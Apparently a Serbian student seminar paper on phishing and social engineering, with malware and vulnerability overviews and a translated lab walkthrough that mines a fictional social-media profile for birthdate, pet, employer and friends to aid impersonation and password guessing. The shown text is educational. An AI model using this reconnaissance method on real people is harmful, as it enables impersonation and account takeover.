You are on page 1of 313

CS535

Etika i privatnost podataka

SEMINARSKI RAD:
Napad ličnih podataka na Internetu
kroz demonstraciju fišinga i
socijalnog inžinjeringa

STUDENT:

Bojana Tomašević Dražić,3903


bojana.tomasevic.3903@metropolitan.ac.rs
U Beogradu, 20.10.2020
Ime i prezime, br.index
CS450 – Cloud Computing

SADRŽAJ:

1 Uvod................................................................................................................................................. 9
2 NAPADI KONCEPTI I TEHNIKE......................................................................................................... 10
3 TIPOVI MALICIOZNOG SOFTVERA...................................................................................................13
3.1 SIMPTOMI ZLONAMERNOG SOFTVERA................................................................................................14
4 SOCIJALNI INŽINJERING.................................................................................................................. 15
4.2 Social Engineering Reconnaissance......................................................................................................16
 Introduction............................................................................................................................................16
 Exam Objectives.................................................................................................................................16
 Lab Diagram.......................................................................................................................................16
 Connecting to your lab.......................................................................................................................17
 Exercise 1 - Social Engineering Reconnaissance..................................................................................18
 Task 1 - Log into MyBook..................................................................................................................18
 Step 1................................................................................................................................................18
 Task 2 - Exploring and Gathering Information...............................................................................19
 Step 1................................................................................................................................................19
 Step 2................................................................................................................................................19
 Step 3................................................................................................................................................21
 Step 4................................................................................................................................................22
 Step 5................................................................................................................................................23
 Summary.................................................................................................................................................25
5 IMPLEMENTACIJA........................................................................................................................... 26
5.1 Generate Phishing Exploit using SET.....................................................................................................27
Scenario...........................................................................................................................................................27
5.1.1 Open Phishing Attachment...........................................................................................................34
5.1.2 Generate Phishing Awareness Email.............................................................................................40
5.2 socijalni inžinjering – implentacija........................................................................................................47
 Introduction............................................................................................................................................47
 Learning Outcomes................................................................................................................................47
 Exam Objectives.....................................................................................................................................48
 Lab Duration...........................................................................................................................................48
 Help and Support...................................................................................................................................48
Projektni zadatak: Naziv projektnog zadatka2
Ime i prezime, br.index
CS450 – Cloud Computing
 Lab Topology..........................................................................................................................................48
5.2.1 Exercise 1- Social Engineering Types and Techniques...................................................................50
 Learning Outcomes................................................................................................................................51
 Task 1 - Know the Basic Components of Social Engineering..........................................................51
 Elicitation.........................................................................................................................................51
 Interrogation....................................................................................................................................51
 Pretexting.........................................................................................................................................52
 Task 2 - Know the Motivation Techniques.......................................................................................52
 Task 3 - Know Phishing and Its Types..............................................................................................52
 Reasons for Successful Phishing Attacks........................................................................................53
 Types of Phishing Attacks................................................................................................................54
 Task 4 - Know Hoax, Baiting, Shoulder Surfing, and Tailgating....................................................54
 Hoax.................................................................................................................................................54
 Shoulder Surfing.............................................................................................................................55
 Baiting..............................................................................................................................................55
 Tailgating.........................................................................................................................................55
5.2.2 Exercise 2 - Using the Social-Engineer Toolkit (SET)......................................................................56
 Learning Outcomes................................................................................................................................56
 Your Devices...........................................................................................................................................56
 Task 1 - Create a Malicious Payload.................................................................................................56
 Step 1................................................................................................................................................57
 Step 2................................................................................................................................................59
 Step 3................................................................................................................................................61
 Step 4................................................................................................................................................63
 Step 5................................................................................................................................................65
 Step 6................................................................................................................................................67
 Step 7................................................................................................................................................69
 Step 8................................................................................................................................................71
 Step 9................................................................................................................................................73
 Step 10..............................................................................................................................................75
 Step 11..............................................................................................................................................77
 Task 2 - Copy the File to the User’s System......................................................................................79
 Step 1................................................................................................................................................79
 Step 2................................................................................................................................................81

Projektni zadatak: Naziv projektnog zadatka3


Ime i prezime, br.index
CS450 – Cloud Computing
 Step 3................................................................................................................................................83
 Step 4................................................................................................................................................85
 Step 5................................................................................................................................................87
 Task 3 - Download the Payload.........................................................................................................89
 Step 1................................................................................................................................................89
 Step 2................................................................................................................................................91
 Step 3................................................................................................................................................93
 Step 4................................................................................................................................................95
 Step 5................................................................................................................................................97
 Step 6................................................................................................................................................99
 Step 7..............................................................................................................................................101
 Step 8..............................................................................................................................................103
 Step 9..............................................................................................................................................105
 Step 10............................................................................................................................................107
 Step 11............................................................................................................................................109
 Step 12............................................................................................................................................111
 Step 13............................................................................................................................................113
 Task 4 - Execute the Payload...........................................................................................................115
 Step 1..............................................................................................................................................115
 Step 2..............................................................................................................................................117
 Step 3..............................................................................................................................................119
 Step 4..............................................................................................................................................121
 Step 5..............................................................................................................................................123
 Step 6..............................................................................................................................................125
 Step 7..............................................................................................................................................127
 Step 8..............................................................................................................................................129
 Step 9..............................................................................................................................................131
 Step 10............................................................................................................................................133
 Step 11............................................................................................................................................135
 Step 12............................................................................................................................................137
 Task 5 - Collect Evidence of Compromise on User’s System........................................................139
 Step 1..............................................................................................................................................139
 Step 2..............................................................................................................................................141
 Step 3..............................................................................................................................................143

Projektni zadatak: Naziv projektnog zadatka4


Ime i prezime, br.index
CS450 – Cloud Computing
 Step 4..............................................................................................................................................145
 Step 5..............................................................................................................................................147
 Step 6..............................................................................................................................................149
 Step 7..............................................................................................................................................151
 Step 8..............................................................................................................................................153
 Task 6 - Conduct Social Engineering Using a Cloned Website.....................................................155
 Step 1..............................................................................................................................................155
 Step 2..............................................................................................................................................157
 Step 3..............................................................................................................................................159
 Step 4..............................................................................................................................................161
 Step 5..............................................................................................................................................163
 Step 6..............................................................................................................................................165
 Step 7..............................................................................................................................................167
 Step 8..............................................................................................................................................169
 Step 9..............................................................................................................................................171
 Step 10............................................................................................................................................173
 Step 11............................................................................................................................................175
5.3 Exercise 3 - Preventing Social Engineering Exploitation......................................................................177
 Learning Outcomes..............................................................................................................................177
 Your Devices.........................................................................................................................................177
 Task 1 - Install Firefox.....................................................................................................................177
 Step 1..............................................................................................................................................178
 Step 2..............................................................................................................................................180
 Step 3..............................................................................................................................................182
 Step 4..............................................................................................................................................184
 Step 5..............................................................................................................................................186
 Step 6..............................................................................................................................................188
 Step 7..............................................................................................................................................190
 Step 8..............................................................................................................................................192
 Step 9..............................................................................................................................................194
 Step 10............................................................................................................................................196
 Step 11............................................................................................................................................198
 Step 12............................................................................................................................................200
 Task 2 - Use the Netcraft Toolbar...................................................................................................202

Projektni zadatak: Naziv projektnog zadatka5


Ime i prezime, br.index
CS450 – Cloud Computing
 Step 1..............................................................................................................................................202
 Step 2..............................................................................................................................................204
 Step 3..............................................................................................................................................206
 Step 4..............................................................................................................................................208
 Step 5..............................................................................................................................................210
 Step 6..............................................................................................................................................212
 Step 7..............................................................................................................................................214
 Step 8..............................................................................................................................................216
 Step 9..............................................................................................................................................218
 Task 3 - Use the PhishTank Website...............................................................................................220
 Step 1..............................................................................................................................................220
 Step 2..............................................................................................................................................222
 Step 3..............................................................................................................................................224
 Review...................................................................................................................................................226
 Summary...............................................................................................................................................226
 Feedback...............................................................................................................................................226
 Practice Labs Ethical Hacker....................................................................................................227
 Conduct Social Engineering Attack....................................................................................................227
 Introduction..........................................................................................................................................227
 Objectives..........................................................................................................................................227
 Lab Diagram.....................................................................................................................................227
 Connecting to your lab.....................................................................................................................228
5.4 Exercise 1 - Use the Social Engineering Toolkit (SET) in Kali Linux......................................................230
 Task 1 - Create an Exploit...............................................................................................................230
 Step 1..............................................................................................................................................230
 Step 2..............................................................................................................................................236
 Step 3..............................................................................................................................................237
 Step 4..............................................................................................................................................239
 Step 5..............................................................................................................................................242
 Step 6..............................................................................................................................................244
 Step 7..............................................................................................................................................245
 Step 8..............................................................................................................................................248
 Step 9..............................................................................................................................................250
 Step 10............................................................................................................................................251

Projektni zadatak: Naziv projektnog zadatka6


Ime i prezime, br.index
CS450 – Cloud Computing
 Task 2 - Setup the FTP Server.........................................................................................................255
 Step 1..............................................................................................................................................256
 Step 2..............................................................................................................................................257
 Step 3..............................................................................................................................................259
 Step 4..............................................................................................................................................261
 Step 5..............................................................................................................................................263
 Task 3 - Download the Payload.......................................................................................................266
 Step 1..............................................................................................................................................266
 Step 2..............................................................................................................................................267
 Step 3..............................................................................................................................................269
 Step 4..............................................................................................................................................271
 Step 5..............................................................................................................................................273
 Step 6..............................................................................................................................................275
 Step 7..............................................................................................................................................278
 Step 8..............................................................................................................................................279
 Step 9..............................................................................................................................................281
 Step 10............................................................................................................................................283
 Step 11............................................................................................................................................286
 Step 12............................................................................................................................................288
 Step 13............................................................................................................................................289
 Step 14............................................................................................................................................291
 Task 4 - Exploit the Victim’s System...............................................................................................295
 Step 1..............................................................................................................................................295
 Step 2..............................................................................................................................................297
 Step 3..............................................................................................................................................298
 Step 4..............................................................................................................................................301
 Step 5..............................................................................................................................................302
 Step 6..............................................................................................................................................304
 Step 7..............................................................................................................................................306
 Summary...............................................................................................................................................309
6 What is Impact Reduction?...........................................................................................................310
7 Zaključak....................................................................................................................................... 311
8 Literatura...................................................................................................................................... 312
9 Prilozi............................................................................................................................................ 313
Projektni zadatak: Naziv projektnog zadatka7
Ime i prezime, br.index
CS450 – Cloud Computing
9.1 Prilog 1................................................................................................................................................314
9.2 Prilog 2................................................................................................................................................315

SPISAK SLIKA:

Slika 1: Kidanje zaštitnog lanca............................................................................................................................11


Slika 1: Logotip BMU.............................................................................................................................................13

Projektni zadatak: Naziv projektnog zadatka8


Ime i prezime, br.index
CS450 – Cloud Computing

1 UVOD
U ovom radu pokriveni su načini pomoću kojeg stručnjaci za sigurnost na Internetu analiziraju šta se dogodilo
nakon sajber napada. Objašnjavaju se ranjivosti softverskog i hardverskog softvera i različite kategorije
sigurnosnih propusta koji mogu uticati na ugrožavanje ličnih podataka.

Razgovara se o različitim vrstama zlonamernog softvera (poznatom kao zlonamerni softver) i simptomima
zlonamernog softvera. Obuhvaćeni su različiti načini na koji se napadači mogu infiltrirati u sistem, kao i napadi
uskraćivanja usluge.

Većina savremenih sajber napada kombininuje različite tehnike napada. Kombinovani napadi koriste više
tehnika za infiltraciju i napad u sistem. Kada napad nije moguće sprečiti, posao profesionalca za sajber
bezbednost je da smanji uticaj tog napada.

U poslednjem poglavlju je prikazana demonstracija fišing napada i socojalong inžinjeringa.

Projektni zadatak: Naziv projektnog zadatka9


Ime i prezime, br.index
CS450 – Cloud Computing

2 NAPADI KONCEPTI I TEHNIKE


Sigurnosne ranjivosti su bilo koja vrsta softverskog ili hardverskog nedostatka. Nakon što steknu
znanje o ranjivosti, zlonamerni korisnici pokušavaju da je iskoriste. Ekploit je termin koji se koristi za
opisivanje programa napisanog da bi se iskoristila poznata ranjivost. Čin upotrebe eksploatacije protiv
ranjivosti naziva se napadom. Cilj napada je pristup sistemu, podacima koje hostuje ili određenom
resursu.

Softverske ranjivosti

Softverske ranjivosti se obično uvode greškama u operativnom sistemu ili kodu aplikacije, uprkos svim
naporima koje kompanije ulažu u pronalaženje i krpanje softverskih ranjivosti, uobičajeno je da nove
ranjivosti isplivaju na površinu. Microsoft, Apple i drugi proizvođači operativnog sistema gotovo
svakodnevno objavljuju zakrpe i ispravke. Ažuriranja aplikacija su takođe česta. Aplikacije poput veb
pregledača, aplikacija za mobilne uređaje i veb servera često ažuriraju kompanije ili organizacije
odgovorne za njih.

U 2015. godini u Cisco IOS-u je otkrivena glavna ranjivost, nazvana SINful Knock. Ova ranjivost je
omogućila napadačima da steknu kontrolu nad usmerivačima korporativnog nivoa, kao što su zastareli
usmerivači Cisco 1841, 2811 i 3825. Tada su napadači mogli nadgledati svu mrežnu komunikaciju i
imali su mogućnost da zaraze druge mrežne uređaje. Ova ranjivost je uvedena u sistem kada je
izmenjena IOS verzija instalirana u rutere. Da biste to izbegli, uvek proverite integritet preuzete IOS
slike i ograničite fizički pristup opreme samo ovlašćenom osoblju.

Cilj ažuriranja softvera je da budu u toku i izbegnu eksploataciju ranjivosti. Iako neke kompanije imaju
timove za testiranje penetracije posvećene pretraživanju, pronalaženju i popravljanju ranjivosti
softvera pre nego što mogu da se iskoriste, nezavisni istraživači bezbednosti takođe su se
specijalizovali za pronalaženje ranjivosti u softveru.

Google-ov Project Zero je sjajan primer takve prakse. Nakon što je otkrio brojne ranjivosti u raznim
softverima koje koriste krajnji korisnici, Google je formirao stalni tim posvećen pronalaženju
softverskih ranjivosti. Google bezbednosna istraživanja možete pronaći ovde.

Projektni zadatak: Naziv projektnog zadatka10


Ime i prezime, br.index
CS450 – Cloud Computing

Hardverske ranjivosti

Hardverske ranjivosti često uvode nedostaci u dizajnu hardvera. Na primer, RAM memorija je u osnovi
kondenzatori instalirani vrlo blizu jedan drugog. Otkriveno je da bi zbog blizine stalne promene
primenjene na jednom od ovih kondenzatora mogle uticati na susedne kondenzatore. Na osnovu te
dizajnerske mane stvoren je ekploit nazvan Rovhammer. Uzastopnim prepisivanjem memorije na iste
adrese, Rovhammer ekploit omogućava preuzimanje podataka iz obližnjih ćelija memorije adresa, čak
i ako su ćelije zaštićene.

Hardverske ranjivosti specifične su za modele uređaja i obično se ne koriste slučajnim pokušajima


ugrožavanja. Iako su eksploati hardvera češći u visoko ciljanim napadima, tradicionalna zaštita od
malvera i fizička sigurnost dovoljna su zaštita za svakodnevnog korisnika.

Slika 1: Kidanje zaštitnog lanca

Većina ranjivosti softverske bezbednosti spada u jednu od sledećih kategorija:

Buffer overflow - Ova ranjivost se javlja kada se podaci zapisuju izvan granica bufera. Baferi su
memorijska područja dodijeljena aplikaciji. Promenom podataka izvan granica bafera, aplikacija
pristupa memoriji dodeljenoj drugim procesima. To može dovesti do pada sistema, ugrožavanja
podataka ili eskalacije privilegija.

Projektni zadatak: Naziv projektnog zadatka11


Ime i prezime, br.index
CS450 – Cloud Computing

Nevalidisani unos - programi često rade sa unosom podataka. Ovi podaci koji ulaze u program mogu
imati zlonamerni sadržaj, dizajniran da prisili program na neželjeno ponašanje. Razmotrite program
koji prima sliku na obradu. Zlonamerni korisnik može da napravi datoteku slike sa nevažećim
dimenzijama slike. Zlonamerno napravljene dimenzije mogu primorati program da dodeli bafere
netačnih i neočekivanih veličina.

Uslovi trke (Race conditions)- Ova ranjivost je kada izlaz događaja zavisi od uređenih ili vremenskih
rezultata. Uslovi trke postaju izvor ranjivosti kada se zahtevani uređeni ili vremenski određeni
događaji ne dogode u pravilnom redosledu ili u odgovarajućem vremenu.

Slabosti u bezbednosnim praksama - Sistemi i osetljivi podaci mogu se zaštititi tehnikama kao što su
potvrda identiteta, autorizacija i šifrovanje. Programeri ne bi trebalo da pokušavaju da kreiraju
sopstvene bezbednosne algoritme jer će to verovatno uvesti ranjivosti. Toplo se savetuje da
programeri koriste sigurnosne biblioteke koje su već kreirane, testirane i verifikovane.

Problemi sa kontrolom pristupa - kontrola pristupa je proces kontrole ko šta radi i kreće se od
upravljanja fizičkim pristupom opremi do diktiranja ko ima pristup resursu, kao što je datoteka, i šta
mogu sa njom učiniti, kao što je čitanje ili promena fajl. Mnoge sigurnosne ranjivosti nastaju
nepravilnom upotrebom kontrola pristupa.

Gotovo sve kontrole pristupa i sigurnosne prakse mogu se prevazići ako napadač ima fizički pristup
ciljanoj opremi. Na primer, bez obzira na to na šta ste postavili dozvole za datoteku, operativni sistem
ne može sprečiti nekoga da zaobiđe operativni sistem i pročita podatke direktno sa diska. Da bi se
zaštitila mašina i podaci koje sadrži, fizički pristup mora biti ograničen, a tehnike šifrovanja moraju biti
zaštićene od krađe ili oštećenja podataka

Projektni zadatak: Naziv projektnog zadatka12


Ime i prezime, br.index
CS450 – Cloud Computing

3 TIPOVI MALICIOZNOG SOFTVERA

Kratko od zlonamernog softvera, zlonamerni softver je bilo koji kod koji se može koristiti za krađu podataka,
zaobilaženje kontrola pristupa ili nanošenje štete sistemu ili kompromitovanje. Ispod je nekoliko tipičnih vrsta
malvera:

Špijunski softver - Ovaj malver je dizajniran za praćenje i špijuniranje korisnika. Špijunski softver često uključuje
tragače aktivnosti, prikupljanje pritiska tastera i prikupljanje podataka. U pokušaju da prevaziđe mere
bezbednosti, špijunski softver često modifikuje sigurnosna podešavanja. Špijunski softver se često pakuje sa
legitimnim softverom ili sa trojanskim konjima.

Advare - Softver podržan oglašavanjem dizajniran je za automatsko prikazivanje oglasa. Advare se često
instalira sa nekim verzijama softvera. Neki advare je dizajniran da isporučuje samo reklame, ali takođe je
uobičajeno da advare dolazi sa špijunskim softverom.

Bot - Od reči robot, bot je zlonamerni softver dizajniran da automatski izvršava radnju, obično na mreži. Iako je
većina botova bezopasna, jedna sve veća upotreba zlonamernih botova su bot mreže. Nekoliko računara je
zaraženo botovima koji su programirani da mirno čekaju naredbe napadača.

Ransomvare - Ovaj zlonamerni softver dizajniran je da drži računarski sistem ili podatke koje sadrži kao
zatvorene dok se ne izvrši uplata. Ransomvare obično radi tako što šifrira podatke u računaru pomoću
nepoznatog ključa za korisnika. Neke druge verzije ransomvare-a mogu iskoristiti određene sistemske ranjivosti
da zaključaju sistem. Ransomvare se širi preuzetom datotekom ili nekom softverskom ranjivošću.

Scarevare - Ovo je vrsta zlonamernog softvera dizajnirana da nagovori korisnika da preduzme određenu radnju
zasnovanu na strahu. Scarevare pravi skočne prozore koji liče na prozore dijaloga operativnog sistema. Ovi
prozori prenose falsifikovane poruke u kojima se navodi da je sistem u opasnosti ili da treba izvršenje
određenog programa da bi se vratio u normalan rad. U stvarnosti, nisu procenjeni ili otkriveni nikakvi problemi i
ako se korisnik složi i odobri da se pomenuti program izvrši, njegov sistem će biti zaražen malverom.

Rootkit - Ovaj zlonamerni softver dizajniran je da modifikuje operativni sistem kako bi stvorio pozadinsku
mrežu. Napadači zatim koriste backdoor za daljinski pristup računaru. Većina rootkitova koristi prednosti
softverskih ranjivosti za eskalaciju privilegija i modifikovanje sistemskih datoteka. Takođe je uobičajeno da
rootkitovi modifikuju sistemsku forenziku i alate za nadgledanje, čineći ih veoma teškim za otkrivanje. Često se
računar zaražen rootkitom-om mora izbrisati i ponovo instalirati.

Projektni zadatak: Naziv projektnog zadatka13


Ime i prezime, br.index
CS450 – Cloud Computing

Virus - Virus je zlonamerni izvršni kod koji je povezan sa drugim izvršnim datotekama, često legitimnim
programima. Većina virusa zahteva aktivaciju krajnjeg korisnika i može se aktivirati u određeno vreme ili datum.
Virusi mogu biti bezopasni i jednostavno prikazuju sliku ili mogu biti destruktivni, poput onih koji modifikuju ili
brišu podatke. Virusi se takođe mogu programirati da mutiraju kako bi se izbeglo otkrivanje. Većinu virusa sada
šire USB uređaji, optički diskovi, mrežni delovi ili e-pošta.

Trojanski konj - trojanski konj je zlonamerni softver koji izvodi zlonamerne operacije pod maskom željene
operacije. Ovaj zlonamerni kod koristi privilegije korisnika koji ga pokreće. Trojanci se često nalaze u
datotekama slika, audio datotekama ili igrama. Trojanski konj se razlikuje od virusa jer se vezuje za neizvršne
datoteke.

Crvi - Crvi su zlonamerni kod koji se repliciraju samostalnim iskorišćavanjem ranjivosti u mrežama. Crvi obično
usporavaju mreže. Dok virus zahteva pokretanje programa domaćina, crvi se mogu pokrenuti sami. Osim
početne infekcije, oni više ne zahtevaju učešće korisnika. Nakon zaraze domaćina, crv se može vrlo brzo
proširiti mrežom. Crvi imaju slične obrasce. Svi oni imaju ranjivost koja omogućava, način za širenje sebe i svi
sadrže korisni teret.

Crvi su odgovorni za neke od najrazornijih napada na Internetu. Kao što je prikazano na slici 1, crv Code Red je
2001. godine zarazio 658 servera. U roku od 19 sati, crv je zarazio preko 300 000 servera, kao što je prikazano
na slici 2.

Čovek u sredini (MitM) - MitM omogućava napadaču da preuzme kontrolu nad uređajem bez znanja korisnika.
Sa tim nivoom pristupa, napadač može presresti i uhvatiti korisničke podatke pre nego što ih prenese na
odredište. MitM napadi se široko koriste za krađu finansijskih informacija. Postoji mnogo zlonamernog softvera
i tehnika koje napadačima pružaju MitM mogućnosti.

Čovek u mobilnom (MitMo) - Varijacija čoveka u sredini, MitMo je vrsta napada koja se koristi za preuzimanje
kontrole nad mobilnim uređajem. Kada se zarazi, mobilnom uređaju se može naložiti da eksfiltrira korisnički
osetljive informacije i pošalje ih napadačima. ZeuS, primer eksploatacije sa MitMo mogućnostima, omogućava
napadačima tiho hvatanje SMS poruka za verifikaciju u 2 koraka poslatih korisnicima.

Projektni zadatak: Naziv projektnog zadatka14


Ime i prezime, br.index
CS450 – Cloud Computing

3.1 SIMPTOMI ZLONAMERNOG SOFTVERA

Bez obzira na vrstu malvera kojim je sistem zaražen, ovo su uobičajeni simptomi malvera:

 Povećava se upotreba procesora.

 Došlo je do smanjenja brzine računara.

 Računar se često zamrzne ili otkaže.

 Došlo je do smanjenja brzine pregledanja Veba.

 Postoje neobjašnjivi problemi sa mrežnim vezama.

 Datoteke su izmenjene.

 Datoteke se brišu.

 Prisutne su nepoznate datoteke, programi ili ikone radne površine.

 Postoje nepoznati procesi.

 Programi se isključuju ili ponovo konfigurišu.

 E-pošta se šalje bez korisnikova znanja ili pristanka.

Projektni zadatak: Naziv projektnog zadatka15


Ime i prezime, br.index
CS450 – Cloud Computing

4 SOCIJALNI INŽINJERING

Socijalni inženjering je pristupni napad koji pokušava da manipuliše pojedincima da izvršavaju radnje ili
otkrivaju poverljive informacije. Socijalni inženjeri se često oslanjaju na spremnost ljudi da budu od pomoći, ali
takođe plene i na njihove slabosti. Na primer, napadač bi mogao da pozove ovlašćenog zaposlenog sa hitnim
problemom koji zahteva trenutni pristup mreži. Napadač se mogao žaliti na ispraznost zaposlenog, pozivati se
na autoritet pomoću tehnika uklanjanja imena ili se žaliti na pohlepu zaposlenog.

Ovo su neke vrste napada socijalnog inženjeringa:

Predtekstovanje - Ovo je slučaj kada napadač pozove pojedinca i laže ga u pokušaju da dobije pristup
privilegovanim podacima. Primer uključuje napadača koji se pretvara da su mu potrebni lični ili finansijski
podaci da bi potvrdio identitet primaoca.

Praćenje - Ovo je slučaj kada napadač brzo sledi ovlašćenu osobu na sigurno mesto.

Nešto za nešto (Kuid pro kuo) - Ovo je slučaj kada napadač zahteva lične podatke od stranke u zamenu za
nešto, poput besplatnog poklona.

Projektni zadatak: Naziv projektnog zadatka16


Ime i prezime, br.index
CS450 – Cloud Computing

4.1 PROBIJANJE WI-FI LOZINKE

Probijanje Wi-Fi lozinke je postupak otkrivanja lozinke koja se koristi za zaštitu bežične mreže. Evo nekoliko
tehnika koje se koriste u probijanju lozinki:

Socijalni inženjering - Napadač manipuliše osobom koja zna lozinku kako bi je pružio.

Napadi grubom silom - Napadač pokušava nekoliko mogućih lozinki u pokušaju da pogodi lozinku. Na primer,
ako je lozinka četvorocifreni broj, napadač bi morao da isproba svaku od 10000 kombinacija. Napadi grube sile
obično uključuju datoteku sa spiskom reči. Ovo je tekstualna datoteka koja sadrži spisak reči preuzetih iz
rečnika. Program zatim pokušava svaku reč i uobičajene kombinacije. Budući da napadima grube sile treba
vremena, složenim lozinkama treba mnogo više vremena da se pogodi. Nekoliko alata za grubu silu lozinki
uključuju Ophcrack, L0phtCrack, THC Hidra, RainbovCrack i Medusa.

Njuškanje mreže - slušajući i hvatajući pakete poslane na mreži, napadač će možda moći da otkrije lozinku ako
se lozinka šalje nešifrirano (u običnom tekstu). Ako je lozinka šifrirana, napadač će je i dalje moći otkriti pomoću
alata za probijanje lozinki.

4.2

Projektni zadatak: Naziv projektnog zadatka17


Ime i prezime, br.index
CS450 – Cloud Computing

4.3 IZVIĐANJE SOCIJALNOG INŽENJERINGA

Projektni zadatak: Naziv projektnog zadatka18


Ime i prezime, br.index
CS450 – Cloud Computing

 Uvod
 Vežba 1 –Izviđanje socijalnog inženjeringa
 Zaključak

 Uvod
Vreme izvršenja: Ova vežba će trajati otprilike oko 20 minuta.

 Ciljevi

Biće pokriveni sledeći ciljevi:

 Socijalni inženjering
 Dijagram

Na slici ispod se može videti topologija mrežne organizacije potrebne za izvršenje ove
vežbe.

Sledi spisak uređaja koji će biti korišćeni, njigovih uloga I pripadajućeg softvera:

 PLABDC01 (Windows Server 2016-domen kontroler)


 PLABDM01 (Windows Server 2016- član server)
 PLABWIN10 (Windows 10 – član domena)
 PLABKALI01 (Kali 2016.2)
 PLABDVWA (Fedora)
 PLABSECON - (Ubuntu-Security Onion)
 PLABWIN701 - (Windows 7)
 PLABXP01 - (Windows XP)
Projektni zadatak: Naziv projektnog zadatka19
Ime i prezime, br.index
CS450 – Cloud Computing

VEŽBA 1- IZVIĐANJE SOCIJALNOG INŽENJERINGA

Kompromis u kompaniji često započinje tako što napadači pretražuju putem društvenih mreža lične
podatke koji bi im mogli pomoći u sticanju legitimnih detalja ili predstavljanjem te osobe u posao.
Obično je cilj dobiti pristup početnom sistemu koji osoba ili poseduje ili mu ima pristup, a odavde će
napadač pokušati da eskalira i kreće se kroz zgradu ili mrežu dobijajući pristup zanimljivijim
oblastima. U ovoj vežbi izvršiće se sledeći zadaci:

 Log na MyBook
 Istraživanje I prikupljanje informacija

Ukratko ćemo istražiti neke lične podatke koje bi oni mogli da koriste i tipične detalje koje uvek treba
čuvati pregledom veb lokacije.

 Zadatak 1 - Log na MyBook

Logovanje na MyBook.

 Korak 1

Obezbediti da je zahtevani uređaj uključen I povezan na PLABWIN10.

Vidi se internet explorer ikona na taskbaru.

Kliknuti na Internet Explorer.

Slika 1.1 Screenshot mašine PLABWIN10: Desktop

U adresni bar ukucati sledeće.

Projektni zadatak: Naziv projektnog zadatka20


Ime i prezime, br.index
CS450 – Cloud Computing

http://mybook

Slika 1.2 Screenshot mašine PLABWIN10: MyBook Philip Nomad Timeline stranica

Odmah nam je predstavljen profil Phillip Nomad na MyBook.

Trenutno, posmatramo Timeline stranicu gde su nedavne aktivnosti u vezi sa životom korisnika javno
postavljene I svako ih može videti.

Zadatak 2 – Istraživanje I prikupljanje informacija

Prikupljanje informacija je ključni deo koji se koristi u bilo kom napadu; pregledaćemo vrste detalja
koje bi napadač mogao iskoristiti da bi stekao poverenje drugih predstavljajući se na neki način na
Filipa.

 Korak 1

Istražujući ovu veb stranicu, malo dalje možemo videti da je Fillip prilično popularan među 1325
sledbenika i da mu je Front End softverski inženjer. To Filipa čini zanimljivom metom s obzirom na to
da vrlo verovatno ima lične podatke koji bi se mogli iskoristiti da prevare kompaniju da pomisli da je
napadač Filip.

 Korak 2

Aktivan je član ove stranice sa objavom od pre samo 5 minuta gde je komentarisao tuđu fotografiju i
deli svoj lični album sa prijateljem.

Projektni zadatak: Naziv projektnog zadatka21


Ime i prezime, br.index
CS450 – Cloud Computing

Slika 1.3 Screenshot PLABWIN10: MyBook Philip Nomad Timeline stranica

Vidimo da je Phillip oženjen. Obratite pažnju na vrstu odeće na dan venčanja, a lokacija venčanja u
pozadini može biti ključna ako su na venčanje pozvani i kolege sa posla.

Slika 1.4 Screenshot of PLABWIN10: MyBook Philip Nomad Timeline stranica

Postoje dva prijatelja, Džon i Aleksis, koji su dovoljno bliski Filipu da komentarišu njegove slike i
saznajemo da postoji mogućnost da Filip postane ili jeste i otac bebe.

Scroll nadole.

Projektni zadatak: Naziv projektnog zadatka22


Ime i prezime, br.index
CS450 – Cloud Computing

Slika 1.5 Screenshot of PLABWIN10: MyBook Philip Nomad Timeline stranica

Zanimljivo je da se Filipov automobil pokvario, ovo bi mogla biti vrlo korisna informacija kada bi
napadač započeo istragu ličnog života Filipa i uspostavio kontakt sa garažom automobila kako bi se
raspitao o vozilu koje Filip vozi.

 Korak 3

Scroll nazad I klik na tab za About.

Figure 1.6 Screenshot PLABWIN10: MyBook Philip Nomad stranica sa bigrafskim podacima

Phillip je ostavio podatke poput broja telefona, datuma rođenja i gde se školovao. Ključne informacije
koje napadači koriste da bi stekli poverenje osoblja koje možda vrši bezbednosne provere. Jedno od
Projektni zadatak: Naziv projektnog zadatka23
Ime i prezime, br.index
CS450 – Cloud Computing

najčešćih korišćenih pitanja je „koji je vaš datum rođenja?“. Sada imamo legitiman odgovor na koji
treba odgovoriti. Da je Filip stvaran, mogli bismo takođe da počnemo da pretražujemo lične podatke na
Univerzitetu Oksford i vidimo da li ćemo dobiti neke pogotke za njega koji pohađa univerzitet, sve
informacije koje pomažu procesu izviđanja.

Slika 1.7 Screenshot PLABWIN10: MyBook Philip Nomad stranica sa bigrafskim podacima

Ovde nam je predstavljeno njegovo prošlo radno iskustvo u radu sa HP-om, a pre toga možemo videti
Kostu. Ponovo bismo mogli da pretražimo HP-ovu stranicu da vidimo šta se otkriva o Filipu; to bi
moglo dovesti napadača do korisnijih informacija kako bi ubedio IT odeljenje da Filipu treba promeniti
lozinku i da li to mogu učiniti umesto njega. Još jedan deo slagalice je moguća lokacija sa sedištem u
kući u Kingstonu na Temzi, često mobilni softver danas popunjava slike ili postove detaljima lokacije
korisnika u trenutku postavljanja.

 Korak 4

Scroll up i klik na tab Album.

Projektni zadatak: Naziv projektnog zadatka24


Ime i prezime, br.index
CS450 – Cloud Computing

Slika 1.8 Screenshot PLABWIN10: MyBook Philip Nomad stranica Album

Ovde primetite da se Filipova pozicija na poslu razvila, on se navodi kao kreativni direktor, koji radi u
Front End Softvare Design-u. Uloga direktora znači neke vrlo važne stvari; Filip ima pristup važnim
resursima i informacijama; njegove lozinke mu verovatno omogućavaju administratorski nivo ili root
pristup domenima ili serverima prepunim podataka koji bi u situacijama poput korporativne špijunaže
mogli biti vrlo unosni. Ovo je album koji je podeljen i možemo videti da on uživa u rejvima,
živopisnim pogledima i možda ima malog psa mopsa, opet klasično pitanje postavljeno u sigurnosnim
pitanjima je „kako je / bilo je ime vašeg prvog ljubimca / pas mačka?" Pored toga, mnogi ljudi koriste
imena svojih kućnih ljubimaca kao lozinke, a datum rođenja za lozinke ili pinove za naloge.

 Korak 5

Scroll up I klik na Friends.

Projektni zadatak: Naziv projektnog zadatka25


Ime i prezime, br.index
CS450 – Cloud Computing

Slika 1.9 Screenshot PLABWIN10: MyBook Philip Nomad stranica Friends


Ovde možemo videti da Filip ima nekoliko kontakata, o kojima bi možda vredelo saznati više.
Primetite da je Sofija Li na Oksfordu i da je moguće da su pohađali univerzitet u isto vreme. Robert
Kuk, koji je fotograf, mogao bi imati zanimljivije fotografije Filipovog života, pružajući više
insistiranja na tipu osobe koja je, odajući karakteristike koje će se koristiti prilikom predstavljanja za
njega.

Slika 1.10 Screenshot of PLABWIN10: MyBook Philip Nomad stranica Friends

